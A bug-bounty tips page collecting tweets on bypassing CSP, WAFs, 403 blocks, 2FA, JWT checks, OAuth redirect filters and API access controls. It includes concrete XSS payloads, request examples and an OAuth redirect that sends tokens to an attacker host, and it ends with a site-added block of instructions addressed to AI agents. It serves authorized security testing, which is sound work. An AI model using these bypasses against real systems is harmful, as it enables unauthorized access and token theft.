# Bypasses

* [It's possible to bypass #CSP with the following : #JSONP: \<script src="https://trustedsite/jsonp?callback=payload"> #AngularJS \<script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> \<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>](https://twitter.com/fasthm00/status/1083371791760818176)
* [Encountered with AWS WAF? Just add "\<!" (without quotes) before your payload and bypass that WAF. :) eg: \<!alert(1) #BugBounty #bugbountytip #bugbountytips](https://twitter.com/neeraj_sonaniya/status/1089235277250387969)
* [If the target is using @Cloudflare , dig in their DNS records and search for the origins IP address. If you attack the application directly by his IP’s cloudflare WAF will not be there.](https://twitter.com/rvismit/status/1090495957802860544)
* [Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc.  iFrame with javascript URI payload. Line feeds \[CRLF\] obfuscate it.](https://twitter.com/LooseSecurity/status/1094615936223625216)
* [Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://\*.foo.foo:\* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip](https://twitter.com/ibrahimdraidia/status/1087031047571849217)
* [Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty](https://twitter.com/ameenmaali/status/1159558019551657984)
* [When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.](https://twitter.com/hakluke/status/1183314554874318849)
* CSP Bypass, script-src 'self' data: - <https://twitter.com/404death/status/1191222237782659072>
* [Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter](https://twitter.com/Hxzeroone/status/1250342399068352512).

![](/files/-M55hqUluNmEHEAZX7-U)

* [I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.](https://twitter.com/imhaxormad/status/1252495614161506309)
  \*

![](/files/-M5RCttFKFy7E15vZIX_)

* OTP bypass - <https://twitter.com/HackerHumble>
* [sometimes you find those PATHs that forwards to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)](https://twitter.com/_ayoubfathi_/status/1041319555308707841)
* Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https\://\*.foo.foo:\* Check if [http://foo.foo](https://t.co/fFNHNkaMK7?amp=1) is claimed. [https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/](https://t.co/gZfKRTWepX?amp=1) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)

{% embed url="<https://twitter.com/HackerHumble/status/1274259490322313219>" %}

Cloudfront Bypass -

{% embed url="<https://twitter.com/jzks3c/status/1263041062450475008>" %}

403 Bypass:

![https://twitter.com/RathiArpeet/status/1315593774773334016](/files/-MKB2mTKXUzWIf2bwQKw)

{% embed url="<https://twitter.com/M404ntf/status/1318387981015724034>" %}

{% embed url="<https://twitter.com/remonsec/status/1315301941170249733>" %}

{% embed url="<https://twitter.com/remonsec/status/1316364534156677121>" %}

![https://twitter.com/hackerscrolls/status/1254701239360720900](/files/-MN7SrOGHSCaJbHz4kwY)

**Tool -**&#x20;

* <https://github.com/lobuhi/byp4xx>

* [h](https://github.com/Raywando/4xxbypass)[ttps://github.com/Raywando/4xxbypass](https://github.com/lobuhi/byp4xx)

* <https://github.com/sting8k/BurpSuite_403Bypasser>

* [if “origin” header not work, try with “x-\[org name\]-origin”, same think for all headers!! e.g x-uber-origin, x-uber-host,..etc](https://twitter.com/m4ll0k/status/1280803080624377857?s=20)

* [#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect\_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...](https://twitter.com/ElMrhassel/status/1282661956676182017?s=20)

* [Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [What worked was... \udfff -> � -> ?](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [Therefore... {"redirectUri":"https://attacker\udfff@\[victim\]/"}](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [Equals... Location: https://attacker?@\[victim\]/](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

* [JWT Token Bypasses #2:](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)

  1. [Capture the JWT token.](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)
  2. [If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)

* [Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bu](https://twitter.com/jae_hak99/status/1285513974931288064?s=20)[gbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)

* Price Manipulation -&#x20;

![https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20](/files/-MT9uPDqxkgsk4a7tGKT)

*

[{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

[POST /api/get\_profile Content-Type: application/json {“user\_id”:,”user\_id”:}](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

[GET /api\_v1/messages?user\_id=VICTIM\_ID --> 401](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

[GET /api\_v1/messages?user\_id=attack\&user\_id=VICTIM --> 200 OK](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

* [How to find authentication bypass vulnerabilities. Focus. I Added headers.](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)

  [Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)

  [Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)
* CSP -[ So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' an call it from external "\<svg>\<link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec](https://twitter.com/akita_zen/status/1263963555805696004?s=20)
*

![https://twitter.com/iam\_j0ker/status/1303658167205728256?s=20](/files/-MTebHg8OI8BG8zWV1nx)

* [CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [But I can raise it again to P3 (Iframe Injection) and Triaged.](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [\<iframe src= blocked by CSP](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [Solution:](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [\<iframe srcdoc=](https://twitter.com/xchopath/status/1164775304700628992?s=20)

{% embed url="<https://twitter.com/d4rkhunt3r_/status/1314249917163077634?s=20>" %}

![](/files/-MWEQ0G-MJy1Fs58xRMf)

* [Auth bypass tip:](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [/api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [Found:](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [/api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact:\[ + \] PII Info disclosure \[ + \] Sensitive info leak \[ + \] Access admin endpoint #bugbantytips #bugbountytips](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)
* [1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips](https://twitter.com/Sm4rty_/status/1368250042436308992?s=20)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gowsundar.gitbook.io/book-of-bugbounty-tips/bypasses.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.